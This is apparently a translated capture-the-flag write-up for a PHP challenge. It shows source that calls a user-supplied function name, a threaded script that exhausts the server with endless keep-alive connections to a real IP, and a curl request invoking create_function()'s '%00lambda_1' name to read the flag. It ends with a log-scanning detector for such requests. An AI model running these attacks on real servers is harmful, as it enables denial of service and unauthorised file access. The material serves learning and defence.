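The platform for this challenge no longer seems to open, so I searched Baidu for the write-ups other players have posted.
It looks like the source code is given directly.
The write-up is from an expert, and that expert in turn cites an even bigger expert.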
```php
<?php
$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    // The request parameter is called as a function name with no validation.
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);
```

Here is the exploit directly:

```python
import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool

try:
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass


def run(i):
    # Each thread keeps opening keep-alive connections and never closes them.
    while 1:
        HOST = '45.76.173.177'
        PORT = 23334
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.sendall(b'GET / HTTP/1.1\nHost:web.suctf.asuri.org:81\nConnection: Keep-Alive\n\n')
        # s.close()
        print('ok')
        time.sleep(0.5)


i = 8
pool = ThreadPool(i)
result = pool.map_async(run, range(i)).get(0xffff)
```

Then run the following command on Linux:

```bash
curl -b idlefire "http://45.76.173.177:23334/?func_name=%00lambda_1"
```
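
An added example, not part of the original write-up: the final request asks for the name that `create_function()` gives its anonymous function, a NUL byte followed by `lambda_N`, and that value stands out in access logs. The sketch below flags such requests; the common-log-format layout and the sample lines are constructed assumptions, and only the `func_name` parameter comes from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common log format (assumed format).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?func_name=hello HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?func_name=%00lambda_1 HTTP/1.1" 200 87',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=2 HTTP/1.1" 200 1024',
    '203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?a=1&func_name=x%0Ay HTTP/1.1" 200 87',
    'truncated line without a request field',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
LAMBDA_RE = re.compile(r'\x00lambda_\d+')    # name format used by create_function()
CONTROL_RE = re.compile(r'[\x00-\x1f\x7f]')  # never valid in a PHP function name


def classify(value):
    """Return why a decoded func_name value is suspicious, or None."""
    if LAMBDA_RE.fullmatch(value):
        return 'anonymous-function name'
    if CONTROL_RE.search(value):
        return 'control character'
    return None


def scan(lines, param='func_name'):
    """Return a list of (line number, client address, reason) for flagged requests."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we can parse
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes, so %00 becomes a real NUL byte here.
        for key, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value) if key == param else None
            if reason:
                hits.append((number, line.split()[0], reason))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```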